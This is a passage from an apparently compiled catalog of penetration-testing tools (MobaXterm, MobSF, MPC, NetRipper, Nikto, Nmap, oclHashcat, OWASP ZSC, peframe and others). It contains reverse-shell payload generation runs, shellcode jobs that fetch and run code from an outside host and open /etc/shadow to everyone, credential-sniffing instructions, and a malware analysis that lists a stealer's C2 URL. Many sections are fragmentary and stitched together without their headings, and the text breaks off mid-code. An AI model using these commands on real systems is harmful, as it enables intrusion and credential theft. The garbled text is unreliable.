or systems.
Key features
system.
Tcl / Tk / Expect: Tcl is a simple-to-learn yet very powerful
language. Tk is its graphical toolkit. Expect is an automation
tool for terminal.
X11Fonts: Complete set of fonts for X11 server.
X3270Suite: IBM 3270 terminal emulator for Windows.
XServers: Xephyr, Xnest, Xdmx, Xvfb and Xfake alternate X11
servers.
Xmllint: A command line XML tool.
Xorg (legacy): The old X11 (Xorg v1.6.5) server: use this
plugin if you have trouble connecting to an old Unix station
through XDMCP.
Zip: Zip compression utility.
DownloadMobaXterm
MOBSF (MOBILE SECURITY FRAMEWORK) - MOBILE
(ANDROID/IOS) AUTOMATED PEN-TESTING FRAMEWORK
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/wiki/Documentation
Queries
v0.8.7 Changelog
Improved Static Analysis Rules
Better AndroidManifest View
Search in Files
v0.8.6 Changelog
Detects implicitly exported component from manifest.
Added CFR decompiler support
Fixed Regex DoS on URL Regex
v0.8.5 Changelog
Bug Fix to support IPA MIME Type: application/x-itunesipa
v0.8.4 Changelog
Improved Android Static Code Analysis speed (2X
performance)
Static Code analysis on Dexguard protected APK.
Fixed a Security Issue - Email Regex DoS.
Added Logging Code.
All Browser Support.
MIME Type Bug fix to Support IE.
Fixed Progress Bar.
v0.8.3 Changelog
View AndroidManifest.xml & Info.plist
Credits
Download Mobile-Security-Framework-Mobsf
MOSCA - STATIC ANALYSIS TOOL TO FIND BUGS
Just another simple static analysis tool that finds bugs the way a grep command would. Mosca has modules called eggs; each egg is a simple config describing what to look for in a specific language (PHP, Ruby, ASP, etc.). Example egg configs live in the "egg" directory. If Mosca reads a source line that matches a vulnerability pattern from the egg, it alerts about the vulnerability and saves it to the logs.
Download Mosca
MPC - MSFVENOM PAYLOAD CREATOR
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc
(The -k flag disables TLS certificate verification for a script you are about to place in /usr/bin and run as root; drop it unless you have a specific reason, and read mpc.sh before executing it.)
Help
root@kali:~# mpc -h -v
[*] Msfvenom Payload Creator (MPC v1.3)
[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
[i] TYPE: + ASP, + ASPX, + Bash [.sh], + Java [.jsp], + Linux [.elf], + OSX [.macho], + Perl [.pl], + PHP, + Powershell [.ps1], + Python [.py], + Tomcat [.war], + Windows [.exe]
[i] https://www.offensive-security.com/metasploit-unleashed/payload-types/
[i] https://www.offensive-security.com/metasploit-unleashed/payloads/
[i] <TCP> is the standard method of connecting back. This is the most compatible with TYPES as it's RAW. Can be easily detected on IDSs.
[i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limits port access on protocol - e.g. TCP 80.
[i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using SSL. Helpful for packet inspection, which limits port access on protocol - e.g. TCP 443.
[i] <FIND_PORT> will attempt every port on the target
Example runs (only part of each run survives in this copy):
Windows, meterpreter, staged, reverse TCP 443:
  IP: 192.168.1.10
  (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
  [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
  [*] Done!
Linux, shell, staged, reverse TCP 4444:
  IP: 192.168.103.238
  (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
  [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
  [*] Done!
Python, shell, stageless, reverse TCP 443:
  [i] interface 4.) lo - 127.0.0.1
  [i] IP: 10.10.100.63
  [i] PORT: 443
  [i] SHELL: shell
  [i] STAGE: stageless
  [i] METHOD: tcp
  [i] MD5: 53452eafafe21bff94e6c4621525165b
  (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
  [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
  [*] Done!
root@kali:~#
To-Do List
Shellcode generation
x64 payloads
IPv6 support
Look into using OS scripting more (powershell_bind_tcp
& bind_perl etc)
Login Password
Database Schema
MySQL Port
MySQL Host/Server Address
URLs visited
POST loads sent
HTTP form logins/passwords
HTTP basic auth logins/passwords
HTTP searches
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
NTLMv1/v2 all supported protocols like HTTP, SMB,
LDAP, etc
Kerberos
Examples
DownloadNet-creds
NETOOL.SH - MITM PENTESTING OPENSOURCE T00LKIT
The netool.sh toolkit provides a fast and easy way for newcomers to IT security pentesting, and also for experienced users, to use almost all the features that a man-in-the-middle position can provide on a local LAN, from scanning and sniffing to social engineering attacks (spear phishing attacks).
DESCRIPTION
Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' -exploit-get ?0x27 -s report.log --comand-vul 'nmap -Pn -p
1-8080 --script http-enum --open _TARGET_'
Operating Systems Supported
"TOOLKIT DEPENDENCIES"
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet |
Apache2 | sslstrip
"SCANNER INURLBR.php"
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl
* Install zenity | Install nmap | Install ettercap | Install
macchanger | Install metasploit | Install Apache2 *
Features (modules)
"1-Show Local Connections"
"2-Nmap Scanner menu"
->
Ping target
Show my Ip address
See/change mac address
change my PC hostname
Scan Local network
Scan external lan for hosts
Scan a list of targets (list.txt)
Scan remote host for vulns
Execute Nmap command
Screenshots
Downloadnetool.sh
NETRIPPER - SMART TRAFFIC SNIFFING FOR
PENETRATION TESTERS
files
netripper.rb
Command line
Injection: NetRipper.exe DLLpath.dll processname.exe
Example:
Generate DLL:
-h, --help
-w, --write             ... configuration data
-l, --location          (default TEMP)
Plugins:
-p, --plaintext         true
-d, --datalimit         E.g. 4096
-s, --stringfinder      user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
Metasploit module
msf > use post/windows/gather/netripper
msf post(netripper) > show options
Module options (post/windows/gather/netripper):
Name          Current Setting                    Required   Description
DATALIMIT     4096                               no
              TEMP                               no
PLAINTEXT     true                               no
                                                 no
                                                 no
                                                 yes
              user,login,pass,database,config    no
1. cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
2. mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
3. g++ -Wall netripper.cpp -o netripper
4. cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
5. cd ../Release
6. cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll
PowerShell module
DownloadNetRipper
NETSPARKER 4 - EASIER TO USE, MORE AUTOMATION
AND MUCH MORE WEB SECURITY CHECKS
This is the first thing you will notice when you launch the new
version of Netsparker Desktop; a more straightforward and
easier to use New Scan dialog. Easy to use software has
become synonymous with Netsparkers scanners and in this
version we raised the bar again, giving the opportunity to many
users to launch web security scans even if they are not that
familiar with web application security.
Once you enter the necessary details, mainly the login form URL and credentials, you can click Verify Login & Logout to verify that the scanner can automatically log in and identify a logged-in session, as shown in the screenshot below.
You do not have to record any login macros because the new mechanism is all based on the DOM. You just have to enter the
The above list just highlights the most prominent features and new security checks of Netsparker Desktop version 4, the only false positive free web application security scanner. This version also includes more new security checks and improvements to several existing ones, hence the scanner's coverage is better than ever before. Of course we also included a number of product improvements.
Since there have been a good number of improvements and changes in this version, some things from older versions of Netsparker are no longer supported, such as scan profiles. Because we changed the way Netsparker saves scan profiles, scan profiles generated with older versions of Netsparker will no longer work. Therefore I recommend checking the Netsparker Desktop version 4 changelog for more information on what is new, changed and improved.
EASY
You can add multiple users with different privileges to the same
Netsparker Cloud account, thus allowing everyone in the
organization to easily collaborate and share all the findings to
streamline the process of securing web applications.
CORRELATED TRENDING REPORTS HELP YOU KEEP
TRACK OF WEB APPLICATION PROJECTS
Web applications are constantly evolving; new features,
functionality and improvements are the order of the day to
ensure they continuously meet all business requirements.
Though such changes also open up new security issues.
Netsparker Cloud security dashboard allows you to easily keep
an eye on the state of security of all web applications while the
trending reports will help you keep track of the quality of work
your developers are doing. Trending reports can also help you monitor who is improving, so you can better assign tasks according to each developer's skills.
Basic usage
Options:
-ask+            ... submitting updates: yes, no, auto (default), send
-Cgidirs+
-Display+        Show redirects; Show cookies received; ... responses; ... require authentication; Debug output; ... errors; Print progress to STDOUT; ... and hostnames; V: Verbose output
-dbcheck
-evasion+        Encoding technique: 1 ... (non-UTF8); Directory self-reference (/./); ... string; Fake parameter; TAB as request spacer; ... the URL; Use Windows directory separator (\); Use a carriage return (0x0d) as a request spacer; B ...
-Format+         Comma-separated-value; htm: HTML Format; msf+: Log to Metasploit; nbe; txt: Plain text; xml: XML Format
-host+           Target host
-IgnoreCode      ... responses
-id+
-list-plugins    ... perform no testing
-maxtime+
-mutate+         Attempt to brute ...; Attempt to guess ...
-nointeractive
-nolookup
-nossl
-no404
-output+         ... for auto-name)
-Pause+          ... integer or float)
-Plugins+        (default: ALL)
-port+
-RSAcert+
-root+
-Tuning+         Scan tuning: Interesting File / Seen in logs; Misconfiguration / Default File; Information Disclosure; Injection (XSS/Script/HTML); Remote File Retrieval - Inside Web Root; Denial of Service; Remote File Retrieval ...; Command Execution / Remote Shell; SQL Injection; File Upload; Authentication Bypass; Software Identification; Remote Source Inclusion; Reverse Tuning Options (i.e., include all except specified)
-timeout+        ... 10 seconds)
-Userdbs
duration
-update          ... from CIRT.net
-useproxy        ... nikto.conf
-Version         ... versions
-vhost+
+ requires a value
Basic Testing
To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.0.1 on TCP port 443:
perl nikto.pl -h 192.168.0.1 -p 443
test more than one port on the same host, specify the list of
ports in the -p (-port) option. Ports can be specified as a
range (i.e., 80-90), or as a comma-delimited list, (i.e.,
80,88,90). This will scan the host on ports 80, 88 and 443.
perl nikto.pl -h 192.168.0.1 -p 80,88,443
DownloadNikto2
NIPE - SCRIPT TO REDIRECT ALL TRAFFIC FROM THE
MACHINE TO THE TOR NETWORK
Script to redirect all the traffic from the machine to the Tor
network.
[+] AUTHOR: Vinicius Gouvea
[+] EMAIL: vini@inploit.com
[+] BLOG: https://medium.com/viniciusgouvea
[+] GITHUB: https://github.com/HeitorG
[+] FACEBOOK: https://fb.com/viniciushgouvea
Installing:
Commands:
COMMAND    FUNCTION
install    To install
start      To start
stop       To stop
Tested on:
Ubuntu 14.10 and 15.04
BunsenLabs Hydrogen
Debian Jessie 8.1 and Wheezy 7.9
Lubuntu 15.04
Xubuntu 15.04
LionSec 3.0
Download Nipe
NIPPER - TOOLKIT WEB SCAN FOR ANDROID
IP Server
CMS Detect & Version
DNS Lookup
Nmap ports IP SERVER
Enumeration Users
Enumeration Plugins
Find Exploit Core CMS
Find Exploit DB
CloudFlare Resolver
Nipper does NOT require ROOT; it only needs Internet permission.
Compatible from Android 2.3 to Android L.
Download Nipper
NMAP 7 - SECURITY SCANNER FOR NETWORK
EXPLORATION & SECURITY AUDITS
Before we get into the detailed changes, here are the top 7
improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new
functionality is developed as part of our NSE subsystem
instead. In fact, we've added 171 new scripts and 20 libraries
since Nmap 6. Examples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is
now powerful enough that scripts can take on core functions
Download Nmap 7
NOPO - NOSQL HONEYPOT FRAMEWORK
NoPo works out of the box with Python version 2.6.x and 2.7.x
on any platform.
Added Features:
Usage
Download NoPo
NORIBEN - YOUR PERSONAL, PORTABLE MALWARE
SANDBOX
Cool Features
If you have a folder of YARA signature files, you can specify it with the --yara option. Every new file created will be scanned against these signatures, with the results displayed in the output results.
If you have a VirusTotal API key, place it into a file named "virustotal.api" (or embed it directly in the script) to auto-submit MD5 file hashes to VT and get the number of positive results.
You can add lists of MD5s to auto-ignore (such as all of your system files). Use md5deep to generate them, put them into a text file, and use --hash to read them.
You can automate the script for sandbox-usage. Using -t to
automate execution time, and --cmd "path\exe" to specify a
malware file, you can automatically run malware, copy the
results off, and then revert to run a new sample.
The --generalize feature will automatically substitute absolute
paths with Windows environment paths for better IOC
@bbaskin
usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [--hash HASH]
                  [-t TIMEOUT] [--output OUTPUT] [--yara YARA] [--generalize]
                  [--cmd CMD] [-d]
optional arguments:
  -h, --help                  show this help message and exit
  -c CSV, --csv CSV           CSV file
  -p PML, --pml PML           PML file
  -f FILTER, --filter FILTER  Specify alternate Procmon Filter PMC
  --hash HASH                 Text file of MD5 hashes to ignore
  --yara YARA                 Folder of YARA signature files
  --generalize                Generalize file paths to their environment variables. Default: True
  --cmd CMD                   Command line to execute (in quotes)
  -d                          Enable debug tracebacks
Download Noriben
NSEARCH - NMAP SCRIPT ENGINE SEARCH
NSEarch is a tool that helps you find Nmap Scripting Engine (NSE) scripts. They can be searched by name or category, and it is also possible to view the documentation of the scripts found.
USAGE:
$ python nsearch.py
Main Menu
Initial Setup
[nsearch ASCII-art banner]
Version 0.3
@jjtibaquira
Creating Database :nmap_scripts.sqlite3
Creating Table For Script ....
Creating Table for Categories ....
Creating Table for Scripts per Category ....
Upload Categories to Categories Table ...
Main Console
nsearch>
Basic Commands
nsearch> help
Nsearch Commands
================
clear
doc
exit
help
history
last
search
nsearch>
nsearch> search name:ssh
1.ssh-hostkey.nse
2.ssh2-enum-algos.nse
3.sshv1.nse
nsearch>
nsearch> doc ssh <TAB>
ssh-hostkey.nse
ssh2-enum-algos.nse
sshv1.nse
Download NSEarch
OCLHASHCAT V2.01 - WORLD'S FASTEST PASSWORD
CRACKER
oclHashcat is the world's fastest and most advanced GPGPU-based password recovery utility, supporting five unique modes of attack for over 170 highly-optimized hashing algorithms.
oclHashcat currently supports AMD (OpenCL) and Nvidia
(CUDA) graphics processors on GNU/Linux and Windows
7/8/10, and has facilities to help enable distributed password
cracking.
FEATURES
ATTACK-MODES
Straight *
Combination
Brute-force
Hybrid dict + mask
Hybrid mask + dict
* accept Rules
ALGORITHMS
MD4
MD5
Half MD5 (left, mid, right)
SHA1
SHA-256
SHA-384
SHA-512
SHA-3 (Keccak)
SipHash
RipeMD160
Whirlpool
GOST R 34.11-94
GOST R 34.11-2012 (Streebog) 256-bit
GOST R 34.11-2012 (Streebog) 512-bit
Double MD5
Double SHA1
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
md5(sha1($pass))
md5($salt.md5($pass))
md5($salt.$pass.$salt)
md5(strtoupper(md5($pass)))
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
sha1(md5($pass))
sha1($salt.$pass.$salt)
sha256($pass.$salt)
sha256($salt.$pass)
sha256(unicode($pass).$salt)
sha256($salt.unicode($pass))
sha512($pass.$salt)
sha512($salt.$pass)
sha512(unicode($pass).$salt)
sha512($salt.unicode($pass))
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
HMAC-SHA256 (key = $pass)
HMAC-SHA256 (key = $salt)
HMAC-SHA512 (key = $pass)
HMAC-SHA512 (key = $salt)
PBKDF2-HMAC-MD5
PBKDF2-HMAC-SHA1
PBKDF2-HMAC-SHA256
PBKDF2-HMAC-SHA512
MyBB
phpBB3
SMF
vBulletin
IPB
Woltlab Burning Board
osCommerce
xt:Commerce
PrestaShop
Mediawiki B type
Wordpress
Drupal
Joomla
PHPS
Django (SHA-1)
Django (PBKDF2-SHA256)
EPiServer
ColdFusion 10+
Apache MD5-APR
MySQL
PostgreSQL
MSSQL
Oracle H: Type (Oracle 7+)
Oracle S: Type (Oracle 11+)
Oracle T: Type (Oracle 12+)
Sybase
hMailServer
DNSSEC (NSEC3)
IKE-PSK
IPMI2 RAKP
iSCSI CHAP
Cram MD5
MySQL Challenge-Response Authentication (SHA1)
PostgreSQL Challenge-Response Authentication (MD5)
SIP Digest Authentication (MD5)
WPA
WPA2
NetNTLMv1
NetNTLMv1 + ESS
NetNTLMv2
Kerberos 5 AS-REQ Pre-Auth etype 23
Netscape LDAP SHA/SSHA
LM
NTLM
Domain Cached Credentials (DCC), MS Cache
Domain Cached Credentials 2 (DCC2), MS Cache 2
MS-AzureSync PBKDF2-HMAC-SHA256
descrypt
bsdicrypt
md5crypt
sha256crypt
sha512crypt
bcrypt
scrypt
OSX v10.4
OSX v10.5
OSX v10.6
OSX v10.7
OSX v10.8
OSX v10.9
OSX v10.10
AIX {smd5}
AIX {ssha1}
AIX {ssha256}
AIX {ssha512}
Cisco-ASA
Cisco-PIX
Cisco-IOS
Cisco $8$
Cisco $9$
Juniper IVE
Juniper Netscreen/SSG (ScreenOS)
Android PIN
GRUB 2
CRC32
RACF
Radmin2
Redmine
Citrix Netscaler
SAP CODVN B (BCODE)
SAP CODVN F/G (PASSCODE)
SAP CODVN H (PWDSALTEDHASH) iSSHA-1
PeopleSoft
Skype
7-Zip
RAR3-hp
PDF 1.1 - 1.3 (Acrobat 2 - 4)
PDF 1.4 - 1.6 (Acrobat 5 - 8)
PDF 1.7 Level 3 (Acrobat 9)
PDF 1.7 Level 8 (Acrobat 10 - 11)
MS Office <= 2003 MD5
Download oclHashcat v2.01
OPENVAS - THE WORLD'S MOST ADVANCED OPEN
SOURCE VULNERABILITY SCANNER AND MANAGER
OpenVAS Scanner
...
OpenVAS Manager
Scheduled scans
User Management
Feed synchronisation
...
Multi-language support
...
OpenVAS CLI
...
Download OpenVAS
OWASP ZAP 2.4.0 - PENETRATION TESTING TOOL FOR
TESTING WEB APPLICATIONS
By default only the essential tabs are now shown when ZAP
starts up.
The remaining tabs are revealed when they are used (e.g. for
the spider and active scanner) or when you display them via
the special tab on the far right of each window with the green '+'
icon. This special tab disappears if there are no hidden tabs.
Tabs can be closed via a small 'x' icon which is shown when
Release 2.4.1
Bug fixes:
Issue 444 : Guaranteed NPE on AliasCertificate.getName() if getCN()==null
Issue 1442 : Up/Down arrow keys in results stop working if
"reflected"
Issue 1473 : Spider does not handle URLs extracted from
meta tags correctly
Issue 1497 : The spider is extracting and reporting links from comments - even when instructed not to do so
Issue 1598 : startup script lacks support for FreeBSD
Issue 1615 : Search "All" option not working
Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when
running in daemon mode on headless machine
Issue 1618 : Target Technology Not Honored
Issue 1619 : Search regex might not be validated
Issue 1624 : Error while loading ZAP 2.4.0
Issue 1626 : Structural parameters not saved when
context exported and not available via the API
Issue 1636 : Users (for auth) & Forced User not loaded
from session
Issue 1647 : Wrong reference in Zest Result
Issue 1674 : Ajax spider not considering get parameters
Issue 1677 : Fuzzers can't be expanded on OS X
Issue 1694 : "Error: setting file is missing. Program will
exit." even if file exists
Issue 1698 : Escape API exceptions
Issue 1700 : Forced Browse Lists Missing from DropDown in 2.4.0
Usage of shellcodes
Shellcodes are small pieces of assembly code that can be used as the payload in software exploitation. Other uses include malware, antivirus bypass, obfuscated code, etc.
Why use OWASP ZSC?
With these switches you can see the OS list, encode types and functions [joblist] available to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to
execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/
passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/
etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/
etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/
passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/
etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/
passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/
etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello2.txt','hello[space]world[space]!')" -o
file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/
Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://
www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','chmod[space]777[space]myfile
.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('script.type','D:\\myfile.type','./
script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('z3r0d4y.sh','/root/
z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('ali.py','/root/Desktop/
0day.py','chmod[space]+x[space]ali.py;
[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o
file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la[space]/etc/shadow;chmod[space]777[space]/etc/
shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/
shadow;wget[space]file[space];chmod[space]777[space]file;
./file')" -o file.txt
>zsc -os linux_x86 -encode none -job
"system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/
passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')"
-o file.txt
shellcode.
Note: script_executor(), download_execute(), download(), dir_create() and file_create() use the Linux command line [wget, mkdir, echo], not the function. The system() function was added to the script; you can use it to do anything and generate any command-line shellcode.
Note: exec() doesn't support any ARGV, such as exec(/bin/bash -c ls) or exec(/bin/bash,-c,ls); you have to wait for the next version, when this feature will be available in system().
Note: you can also use a high value for inc and dec times, like inc_100000, but your shellcode may get too big.
Note: each time you execute the chmod() [or any other] function with random encoding, you will get random outputs and different shellcode.
Note: your xor value could be anything. xor_0x41414141 and
xor_0x45872f4d are examples.
Wizard Switch
With the -wizard switch you are able to generate shellcode without long ARGVs; the software will ask you for the information.
Note: While you are using the -wizard switch, if you press Enter without typing anything, the default value will be set on the variable.
Note: By entering "list", a list of values will be shown.
Available Features
[linux_x86]
add mix_all encoding in dir_create() [linux_x86]
add xor_random encoding in download() [linux_x86]
add xor_yourvalue encoding in download() [linux_x86]
add add_random encoding in download() [linux_x86]
add add_yourvalue encoding in download() [linux_x86]
add sub_random encoding in download() [linux_x86]
add sub_yourvalue encoding in download() [linux_x86]
add inc encoding in download() [linux_x86]
add inc_timesyouwant encoding in download() [linux_x86]
add dec encoding in download() [linux_x86]
add dec_timesyouwant encoding in download() [linux_x86]
add mix_all encoding in download() [linux_x86]
add xor_random encoding in download_execute() [linux_x86]
add xor_yourvalue encoding in download_execute() [linux_x86]
add add_random encoding in download_execute() [linux_x86]
add add_yourvalue encoding in download_execute() [linux_x86]
add sub_random encoding in download_execute() [linux_x86]
add sub_yourvalue encoding in download_execute() [linux_x86]
add inc encoding in download_execute() [linux_x86]
add inc_timesyouwant encoding in download_execute() [linux_x86]
add dec encoding in download_execute() [linux_x86]
add dec_timesyouwant encoding in download_execute() [linux_x86]
add mix_all encoding in download_execute() [linux_x86]
add xor_random encoding in system() [linux_x86]
add xor_yourvalue encoding in system() [linux_x86]
add add_random encoding in system() [linux_x86]
add add_yourvalue encoding in system() [linux_x86]
Download OWASP ZSC
PACKET SENDER - THE UDP AND TCP NETWORK TEST
UTILITY
Change log
Version 2015-04-19
Portable mode
Read in file from command line
Save traffic log
Mobile versions have been abandoned. Project focus
is now on the far more popular desktop version.
Version 2015-02-13
Migrated to GitHub
New vector-based logo
Bug fix in quick-disable/enable
Migrated to Qt 5.4
Ubuntu version brought up to date.
Forums are closed (spammers killed it).
Version 2014-10-07
Initial launch of forums.
Multi-Send.
Quick-send from traffic log selected packets.
Packet Export/Import.
Rolling traffic log support.
Numerous configuration settings added:
Copy raw packet data to clipboard.
Receive before send.
Connection delays for slow devices.
Command line interface default binds to 0.
Universal (XP through 8.1) Windows installer.
Migrated to Qt 5.3
Some rework of the "About" section.
Version 2014-02-22
TCP connections are now fully threaded (no more UI
freezes).
Brand new and highly capable command line
interface. (Run PacketSender --help)
Some mild UI enhancements to make sending
easier.
Download Packet Sender
Download PackETH
PASSGEN - RANDOM CHARACTER GENERATOR CRUNCH
TO CRACK WPA/WPA2
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length
Download Passgen
PASSWORD CRACKING SUITE
Dics Path:
In this path, you can add any dictionary you would like to use.
Tools Path:
In this path, the script will install 3rd party tools. You can
download some here:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-cracking-mega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html
FTP
POP3
IMAP
SMTP
Options
--json
Output in json
--import
--export
--dir-import
Import directory
--dir-export
Export directory
Debug directory
--dir-tls
TLS directory
--strings
--sections
Sections information
--dump
Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git
$ cd peframe
# python setup.py install
Example
$ peframe malware.exe
Short information
-----------------------------------------------------------
File Name       malware.exe
File Size       935281 byte
Compile Time    2012-01-29 22:32:28
DLL             False
Sections
Hash MD5        cae18bdb8e9ef082816615e033d2d85b
Hash SHA1       546060ad10a766e0ecce1feb613766a340e875c0
Imphash         353cf96592db561b5ab4e408464ac6ae
Detected
Directory       Security

XOR discovered
-----------------------------------------------------------
Key length      Offset (hex)    Offset (dec)
                0x5df4e         384846
                0x5df4e         384846
                0x5df4e         384846
                0x5df4e         384846

Digital Signature
-----------------------------------------------------------
Virtual Address 12A200
Block Size      4813 byte
Hash MD5        63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1      53731a283d0c251f7c06f6d7d423124689873c62

Packer
Packer
Packer

Anti Debug      FindWindowExW
Anti Debug      FindWindowW
Anti Debug      GetWindowThreadProcessId
Anti Debug      IsDebuggerPresent
Anti Debug      OutputDebugStringW
Anti Debug      Process32FirstW
Anti Debug      Process32NextW
Anti Debug      TerminateProcess
Anti Debug      UnhandledExceptionFilter
Virtual Box Trick
VMware trick

Function        CreateDirectoryA
Function        CreateFileA
Function        CreateFileMappingA
Function        CreateToolhelp32Snapshot
Function        DeleteFileA
Function        FindFirstFileA
Function        FindNextFileA
Function        GetCurrentProcess
Function        GetFileAttributesA
Function        GetFileSize
Function        GetModuleHandleA
Function        GetProcAddress
Function        GetTempPathA
Function        GetTickCount
Function        GetUserNameA
Function        GetVersionExA
Function        InternetCrackUrlA
Function        LoadLibraryA
Function        MapViewOfFile
Function        OpenProcess
Function        Process32First
Function        Process32Next
Function        RegCloseKey
Function        RegCreateKeyA
Function        RegEnumKeyExA
Function        RegOpenKeyA
Function        RegOpenKeyExA
Function        Sleep
Function        WSAStartup
Function        WriteFile
Function        closesocket
Function        connect
Function        recv
Function        send
Function        socket

Section         .data
Hash MD5        b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1      523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section         .rdata
Hash MD5        41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1      b674141b34f843d54865a399edfca44c3757df59

File name discovered [43]
-----------------------------------------------------------
Binary          wiseftpsrvs.bin
Data            ESTdb2.dat
Data            Favorites.dat
Data            History.dat
Data            bookmark.dat
Data            fireFTPsites.dat
Data            quick.dat
Data            site.dat
Data            sites.dat
Database        FTPList.db
Database        sites.db
Database        NovaFTP.db
Executable      unleap.exe
Executable      explorer.exe
FTP Config      FTPVoyager.ftp
Library         crypt32.dll
Library         kernel32.dll
Library         mozsqlite3.dll
Library         userenv.dll
Library         wand.dat
Library         wininet.dll
Library         wsock32.dll
Text            Connections.txt
Text            ftplist.txt
Text            signons.txt
Text            signons2.txt
Text            signons3.txt
RhinoSoft.com
Url             http://0uk.net/zaaqw/gate.php
AutoIt v3 Script
FileVersion     3, 3, 8, 1
FileDescription
Translation     0x0809 0x04b0
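The "XOR discovered" table above comes from searching the binary for a known plaintext hidden under a repeating XOR key. As an added illustration (not peframe's own code), this Python scan derives the key at every offset from the classic DOS-stub marker and reports key length and offset in the same shape; the sample buffer is constructed, and the check generalises to any key length you choose to test:

```python
# Added example (not peframe's code): find XOR-encoded copies of a known
# plaintext marker inside a binary and report key length, offset and key,
# mirroring peframe's "XOR discovered" table. The sample buffer is constructed.
from itertools import cycle

DOS_STUB = b"This program cannot be run in DOS mode"   # marker present in every PE


def xor_bytes(data: bytes, key: bytes) -> bytes:
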